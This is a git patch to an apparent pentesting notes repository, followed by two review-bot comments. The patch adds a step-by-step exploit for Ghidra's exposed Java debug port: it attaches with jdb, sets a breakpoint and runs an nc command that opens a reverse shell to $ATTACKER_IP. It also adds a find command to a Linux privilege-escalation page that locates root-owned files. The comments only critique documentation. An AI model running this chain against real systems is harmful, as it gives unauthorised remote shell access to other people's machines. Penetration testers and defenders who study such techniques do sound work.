From b45e18400ae702488b170936db5995c3f4e8ad48 Mon Sep 17 00:00:00 2001 From: whx Date: Mon, 3 Jan 2022 00:43:31 +0100 Subject: [PATCH] added ghidra debugger exploit --- exploit/java/ghidra_debug.md | 19 +++++++++++++++++++ .../priv_esc/docs/linux_priv_esc.md | 4 ++++ 2 files changed, 23 insertions(+) create mode 100644 exploit/java/ghidra_debug.md diff --git a/exploit/java/ghidra_debug.md b/exploit/java/ghidra_debug.md new file mode 100644 index 0000000..c688d64 --- /dev/null +++ b/exploit/java/ghidra_debug.md @@ -0,0 +1,19 @@ +# Ghidra Debug RCE + +* If debug mode is enabled, connect to it via `jdb` +```sh +jdb -attach $TARGET_IP:$TARGET_PORT +``` +```sh +classpath +classes +``` +* Stop the service +```sh +stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run() +``` +* Wait until the breakpoint hits and start a reverse shell +```sh +print new java.lang.Runtime().exec("nc.traditional $ATTACKER_IP 4449 -e /bin/sh") +``` + diff --git a/post_exploitation/priv_esc/docs/linux_priv_esc.md b/post_exploitation/priv_esc/docs/linux_priv_esc.md index a9d83e0..c290ec1 100644 --- a/post_exploitation/priv_esc/docs/linux_priv_esc.md +++ b/post_exploitation/priv_esc/docs/linux_priv_esc.md @@ -34,6 +34,10 @@ find / -type f -name "authorized_keys" -o -name "id_rsa" 2>/dev/null ``` * [Shared object injection](../../../exploit/linux/shared_object_injection.md) * [CVE-2016-1247](https://www.cvedetails.com/cve/CVE-2016-1247/) +* User specific files +```sh +find / -user root -name "*.txt" +``` ## Sudo Binary * [Baron Samedit](../../../exploit/linux/sudo/baron_samedit.md)
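Review bot: In the `ghidra_debug.md` hunk the precondition and the risk are undocumented: "If debug mode is enabled" never says what is listening or how to confirm it, and the `classpath` / `classes` block has no bullet explaining that these are `jdb` commands run inside the attached session. Since `jdb -attach $TARGET_IP:$TARGET_PORT` only works against an exposed Java debug agent, the note should open by stating that the whole chain hinges on the debug port being reachable, and close with the fix (do not launch Ghidra with debugging enabled, or keep the debug port bound to localhost). Two smaller points: `$TARGET_IP`, `$TARGET_PORT` and `$ATTACKER_IP` are used without being defined anywhere in the file, and `stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()` only fires if that log4j watcher thread actually runs, so "Wait until the breakpoint hits" should say what triggers it or that the wait may be indefinite.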
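Review bot: In the `linux_priv_esc.md` hunk the new bullet text does not match its command: "User specific files" describes a per-user search, but `find / -user root -name "*.txt"` lists root-owned `.txt` files. Either rename the bullet (for example "Root-owned text files") or change the filter. Also, unlike the `find / -type f -name "authorized_keys" ...` line just above it, the new command lacks `2>/dev/null`, so a `find /` run as an unprivileged user will flood the output with permission errors; add the redirect for consistency with the rest of the file.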